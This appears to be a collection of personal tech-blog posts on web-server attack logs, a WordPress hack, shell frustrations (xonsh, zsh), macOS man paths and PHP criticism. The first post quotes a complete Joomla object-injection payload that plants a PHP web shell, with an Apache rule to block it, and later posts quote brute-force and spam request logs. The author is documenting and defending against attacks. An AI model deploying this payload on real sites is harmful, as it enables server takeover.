An interesting injection attach via the HTTP user agent string

Looking at my web server logs this morning I noticed a new attack signature. The attacker performs a “GET /” with this “User-Agent” header:

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9

It’s obviously a code injection attack. Googling tells me this attack was first documented in December 2015 such as in this writeup. It’s an attempt to inject code via a Joomla CMS vulnerability. I don’t use Joomla so this doesn’t affect my site.

I already had some Apache HTTPD rules to protect against malicious user agent strings including one to detect if it begins with a left bracket:

RewriteCond %{HTTP_USER_AGENT} ^\[ [OR]

Noticing this attack suggests that generalizing that rule would be helpful. So my Apache config now contains this instead:

# If first char isn't an alphanumeric or underscore it's quite possibly an
# attempt to inject code.
RewriteCond %{HTTP_USER_AGENT} ^\W [OR]

I got hacked

I really dislike both PHP and WordPress despite using the latter, and thus the former implicitly, for this blog. Why? Because both make it far to easy to be hacked. Which happened to me just a few days ago. Despite not installing any third-party WordPress plugins and having a robust firewall against malformed web requests and regularly updating my software. In this case someone exploited a WordPress 4.7.0/4.7.1 vulnerability recently introduced into its REST API. They managed to replace my most recent post prior to this one. Google “attack /index.php/wp-json/wp/v2/posts” to learn more about this vulnerability.

Fortunately I backup my WordPress database and was thus able to restore it to a known good state. And this particular vulnerability did not allow the attacker to change any files; only content in the WP database. I was fortunate because I make regular backups of critical files and have my web site managed by git source code management. The former made it relatively easy to recover from the hack and the latter made it easy to determine my static content had not been compromised.

Xonsh is no longer a possible replacement for zsh

A few weeks ago I wrote about my dissatisfaction with zsh. I decided to take a close look at xonsh and fish.

I decided to try xonsh first because I’m a Python aficionado (I’ve been using it as my primary language for eight years). The idea of using all of my favoriate Python language features and standard library along with the ease of launching external commands with I/O redirection and pipelines was intriguing. Because xonsh is currently at version 0.2.3 it was clear that the author didn’t believe it was ready for primetime. Nonetheless, I was willing to give it a try as the documentation and mailing list suggested it was in good enough shape for a software engineer like myself who is used to using software that is rapidly changing.

The first thing I did after installing it was run a few external commands and python statements. I then showed the command history using the builtin history command. So far, so good. I then tried showing the most recent command in the history using history show -1. That worked fine. Okay, let’s do something a little more challenging; show the most recent five history entries:

$ history show -5:
usage: history [-h] {show,id,file,info,diff,replay,gc} ...
history: error: unrecognized arguments: -5:

Oops! The documentation says that should work. The inverse, showing the first five entries with history show :5 does work. So I sent a mesasge to the mailing list. Almost immediately the creator of xonsh responded with a proposed fix in the form of a github pull request. Looking at the proposed fix I saw my first red flag. The fix was a kludge and included no unit tests to ensure that the fix was correct and to keep regressions from occurring. I countered with my own pull request that included extensive unit tests for the bug I was fixing.

I was happy to see that the author cares about fixing bugs in a timely manner. I was less happy that his proposed fix was something I would barely tolerate from a summer intern. Worse, before creating my fix I ran pylint against the module. OMFG! Pylint gave it a score of 7.13 out of 10. Worse, pylint pointed out two outright bugs due to misnamed variables. The only way to tell if my change introduced more lint was to diff the lint output before and after my fix was commited. That is totally unacceptable. Too, the entire code base was riddled with problems ranging from the nitpicking trivial (trailing whitespace on a line, lines too long) to serious (missing doc strings, too many references to protected object members).

I was also deeply troubled by such bogosities as injecting __xonsh_history__ and __xonsh_env__ into the builtins module scope. Not only that but those are the primary means of accessing xonsh configurable settings. Ugh! For example, from the history.py module:

data_dir = builtins.__xonsh_env__.get('XONSH_DATA_DIR')

Despite that rocky start I thought there was enough positive things about the project to try using it and contributing to its improvement. But the code would have to be cleaned up before I would make any other substantive changes. So I asked it would be okay if I contributed a sequence of changes to make the code lint clean. Getting the green light I submitted several lint cleanup pull requests. Getting each one accepted was a challenge. Primarily because the project owner isn’t really interested in having lint clean code. The final straw that made me decide to give up on the project as hopeless were two cleanups the project owner objected to.

The first was changing

if len(inp) == 0:

to

if not inp:

Anthony told me to revert that because he didn’t like the negative conditional. The second was changing

for d in filter(os.path.isdir, path):

with

for d in (p for p in path if os.path.isdir(p)):

Anthony’s objection this time was that he prefers filter and map to list comprehension and generator functions. When I countered that filter and map are deprecated he said in effect “why are they builtins if they’re deprecated”. All you have to do is Google “python map filter deprecated”. One of the two five results is this article by Guido van Rossum proposing that map, filter, and reduce be removed from python3. There’s plenty of other web pages that also make the case for not using them.

In other words, Anthony tries to use Python as if it were a different language. He doesn’t appreciate that there is such as thing as idiomatic Python. Anthony believes that just because you can achieve a result in more than one way there is no reason to prefer one alternative over another other personal preference. Sorry, but I can’t contribute to a project with those ideals.

So I’m off to try fish.

P.S., I forgot to mention two other things that gave me a WTF moment. The first was when I noticed that the directions for running the unit tests did not test the code in my local git repository — it tested the code installed by pip. Running the tests were also not hermetic — they were affected by my local ~/.xonshrc file. Too, I couldn’t just type “make test” to execute the tests. So I decided to fix all of those problems. In the process of getting my changes accepted Anthony told me he wrote the directions to specifically test the installed code, not the code in his git repository and he didn’t understand why anyone would test their uncommitted code. So either he doesn’t test changes before committing them or he regularly installs and runs untested code.

Second, the history subsystem is weird. Don’t take my word for it, go read the xonsh history documentation. Notice too this only partially correct assertion in the first paragraph of that page: “This is saved when the shell exits”. Okay, that is true of bash but it’s not true of many other shells sharing the same Bourne shell lineage such as zsh. Also, bash provides history -a to manually save the history and history -r to read it so you’re not limited to writing the current shell history only when it exits. Yes, yes, that’s a pretty braindead approach so I agree with Anthony regarding bash but other shells like zsh have managed to implement a sane solution without requiring xonsh’s ridiculously over-engineered solution.

Mac OS X man command ignores $MANPATH (which sucks for HomeBrew installed commands)

I recently ran brew install coreutils to get the GNU versions of various commands such as ls. The first thing I noticed was that “man ls” did not display the man page for the GNU ls command. Even after setting the $MANPATH environment variable to include the relevant directory the man page was not displayed. Not even with “man -a ls” which should have shown all matching man pages in succession. The $MANPATH environment variable is completely ignored on Mac OS X as far as I can determine.

Similarly, editing /etc/manpaths and creating a file in /etc/manpaths.d containing the appropriate paths had no effect.

Only editing /etc/man.conf had any effect. Furthermore, it was not enough to simply add a MANPATH directive before any of the stock entries. Doing so did allow “man -a ls” to display the GNU ls man page but it was still not the primary man page. To make the GNU ls man page the primary I also had to add a MANPATH_MAP directive before any of the other MANPATH_MAP directives. Once I did that executing “man ls” and “man -w ls” shows the HomeBrew installed ls command man page as the primary documentation for that command.

Note that by default the man pages for HomeBrew commands that do not shadow standard commands are found and displayed by the man command. That is because a “MANPATH /usr/local/share/man” entry in /etc/man.conf is sufficient to find the associated man pages. It’s not clear whether that entry is present in a stock Mac OS X installation or is added by HomeBrew.

I love Mac OS X and would rather get a root canal than use MS Windows. But once in a while an annoyance like this one makes me wonder if anyone at Apple actually verifies that the software behaves as the documentations states.

It’s time to replace Zsh with a saner shell because “unsetopt multifuncdef” breaks tab completion

Preface: I switched to Zsh roughly seven years ago. Prior to that I used Ksh93 for a decade. I’ve used many other UNIX shells prior to that (going back to approximately 1985 when I got my hands on my first AT&T SysV UNIX system). I’ve also used numerous shells on non-UNIX operating systems including IBM mainframes. So I like to think I’m not narrow-minded and parochial on issues such as which command shell is best.

On the zsh-users mailing list someone recently wrote about a zsh behavior that surprised them. The person ran

$ git add foo().bar

That created three functions named git, add, and foo. That’s because Zsh by default allows multiple function names when defining a function. This is considered a feature by the Zsh community. Worse, it is enabled by default and you can disable it. I view both capabilities as two of the many ill-advised features that has turned zsh into a shell whose behavior is almost impossible to understand or predict.

After reading that message thread I figured it would be a good idea to disable this feature in my interactive shells so I added

unsetopt multifuncdef

to my ~/.zshrc file. Imagine my surprise when a few days later after rebooting my computer and starting fresh shells finding that any attempt to invoke tab completion results in this error:

_main_complete:143: parse error near `()'

That’s because the /usr/share/zsh/5.0.8/functions/_main_complete file contains this block of code:

TRAPINT TRAPQUIT() {
    zle -M "Killed by signal in ${funcstack[2]} after ${SECONDS}s";
    zle -R
    return 130
}

Because zsh has no concept of modules or namespaces (other than function scope) changing an option in an interactive shell can readily break any function that is autoloaded by that shell; such as the completion functions.

Frankly, I’ve encountered too many such annoyances with Zsh. Even the developers who answer questions on the zsh-users mailing list frequently do the virtual equivalent of shrugging their shoulders and saying that some behavior or other is weird but it’s too late to change it. Not to mention too many of them seem to think it is a good thing that Zsh encourages writing code more cryptic than your typical Perl programmer would ever dream of. Such as this:

_comp_colors+=( "=(#i)${prefix[1,-2]//?/(}${prefix[1,-2]//(#m)?/${MATCH/$~toquote/\\$MATCH}|)}${prefix[-1]//(#m)$~toquote/\\$MATCH}(#b)(?|)*==$tmp" )

Or this:

list=(${${${(0)"$(git config -z --get-regexp '^alias\.')"}#alias.}%$'\n'*})

Bye-bye, Zsh. It’s time to switch to a saner shell.

P.S., Yes, I understand I could simply file a bug report to make the standard completion code robust in the face of a user unsetting that option. The point is that this is not an isolated incident. It reflects a fundamental problem with zsh trying to be all things to all people.

P.P.S., This bug apparently only existed in zsh v5.0.8 (the version that currently ships with Mac OS X 10.11 “El Capitan”). Great, someone noticed and fixed the problem quickly. That doesn’t negate my broader point that zsh simply has too many ad-hoc features that interact in surprising ways.

Updated 2015-10-28: Over the next couple of days I’m going to look closely at Xonsh and Fish for interactive use. If I don’t choose either of those I’ll probably go back to Ksh93. For scripting I’m going to switch to Bash.
Updated 2015-10-29: Two days ago a discussion was started about extending the recursive globbing syntax. Today one of the primary developers posted a patch to implement yet another configurable option to alter how recursive globbing works. With no discussion regarding alternatives, potential problems, whether the added complexity is worthwhile, etc. This is exactly the type of hastily implemented change that has made zsh a kitchen sink of features that don’t always play well together. And is another example for why I’m abandoning zsh for a more stable shell.

I would rather be unemployed than forced to write code in PHP

My blog currently uses WordPress. I’ve written numerous times about the various PHP based attacks I see every day because of the stupid security mistakes PHP programmers make. I’ve also made a few changes to the WordPress software to make it saner about handling and logging requests. Thus I knew PHP was awful from my own limited interaction with it. Then I came across this article: PHP: a fractal of bad design. This one point from that article should be enough to result in a death sentence for the language:

PHP’s one unique operator is @ (actually borrowed from DOS), which silences errors.

Holy shit! The developer(s) of PHP remind me of a coworker in my first post college job. He thought he could design and implement a new language. Yet he had no idea what the computer science terms “parser”, “lexical analysis”, “tokenizer” etc. meant. I suspect he would be welcomed by the PHP community.

Interesting new WordPress attack signature using POST /xmlrpc.php

Today I noticed an interesting, and hitherto unseen, attack from 5.152.192.218 which is owned by cloud provider redstation.com (or redstation.co.uk if you prefer). The attack started with this request:

POST /xmlrpc.php HTTP/1.0
Host: www.skepticism.us
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>

Note the ancient HTTP/1.0 protocol specification. The methodCall is also ill-formed causing PHP to issue a notice and warning messages about Undefined index: VALUE and Invalid argument supplied for foreach().

That request was followed by another POST /xmlrpc.php that attempted to use the system.multicall method; something I’ve never seen in an attack before now. The “multicall” methods were all wp.getCategories invocations with my user ID and various passwords. In the past six months (as far as my logs go) I only started seeing attempts to exploit wp.getCategories two days ago. And this attack was the first one to do so by using system.multicall to reduce the number of requests it had to make to test which, if any, of large number of passwords was valid

A few minutes after writing the previous text I noticed that I had in fact seen another attack employing the system.multicall method to execute wp.getCategories multiples times in a single request. That attack was from ttnetdc.com in Turkey. That attack was very different. First, it was not preceded by the demo.sayHello request. Second, the wp.getCategories calls all used the generic admin account rather than my account. Third, the XML was formatted in a more or less human readable form rather than the tightly packed sequence of tokens from the attack I saw this morning and talk about above.

Thus it appears that a general approach about how to efficiently test for valid WordPress credentials was recently documented and we’re now seeing various hackers attempt to exploit that advice.

Twitter needs to hire a competent software engineer to fix their web crawler

This evening I posted an article about an Indiana State Police trooper who uses his position of power to proselytize to motorists he stops. That resulted in Twitter crawling my web server. Which would be fine but the first four requests, in a 715 ms interval, were GET /robots.txt. Every single request request came from the same address. Every single response was a HTTP 200 status that included the contents of the robots.txt file. Every single response took less than one 1 ms. What the fuck? How hard is it to avoid duplicate requests from a queue (hint: it’s pretty fucking easy)?

I went to the Twitter web page in the hope of finding an email address or web form where I could provide some constructive feedback regarding their web crawler. If it exists I couldn’t find it after searching for nearly ten minutes.

Regular expressions: “Now you have two problems”

I’ve used the Zsh shell as my primary command line and scripting shell for the past seven years; and before that Korn shell for over a decade. Recently on the zsh-users mailing list someone asked for help that resulted in a recommendation to use a negative look-ahead regular expression.

Mikael Magnusson correctly pointed out

As a sidenote, (^foo)* is always useless to write,
since (^foo) will expand to the empty string, and then
the * will consume anything else. A useful way to think
of (^foo) is a * that will exclude any matches that
don't match the pattern foo.

To which I replied that people should Google “regular expression negative lookahead”. Which will result in numerous articles talking about Jamie Zawinski’s observation:

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

I wholeheartedly agree with that sentiment. Notwithstanding the fact I still employ regular expressions every single day. The important thing being that I avoid them outside of ad-hoc interactive searches unless I have expended considerable thought about their correctness and failure modes if handed malformed input.

Thailand has reached #1 in attacks against my server

The number of attacks from Thailand has been a significant fraction of the total for several months. In the past 24 hours I saw attacks from 51 address in Thailand, 241 in the past week. That exceeds the runner-up country (US) by a factor of five. Ten months ago I noted that Italy was the source of a disproportionate number of attacks.

Every single recent attack from Thailand has attempted to register a bogus WordPress account via a POST /wp-login.php?action=register request. Some piece of malware has managed to successfully infect a huge number of personal computers in Thailand and nowhere else. All of the computers are in the totbb.net domain

Below is the most recent such request. The details of the user login and email vary but the other details are pretty consistent.

P.S., I recognize that the numbers I’m reporting are insignificant compared to most web servers let alone the Internet as a whole. But that’s the point. My web server (blog) is only a little over a year old. My server is itself insignificant. Which means I have relatively little traffic to wade through. Which makes detecting some problems and trends easier.

POST /wp-login.php?action=register HTTP/1.1
Host: www.skepticism.us
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: Keep-Alive
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388
Version/12.17
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png,
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://www.skepticism.us/wp-login.php?action=register
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

user_login=PattiThorne3&user_email=pattisabj9571%40admin2%40metalchopsaw.info&redirect_to=&wp-submit=Register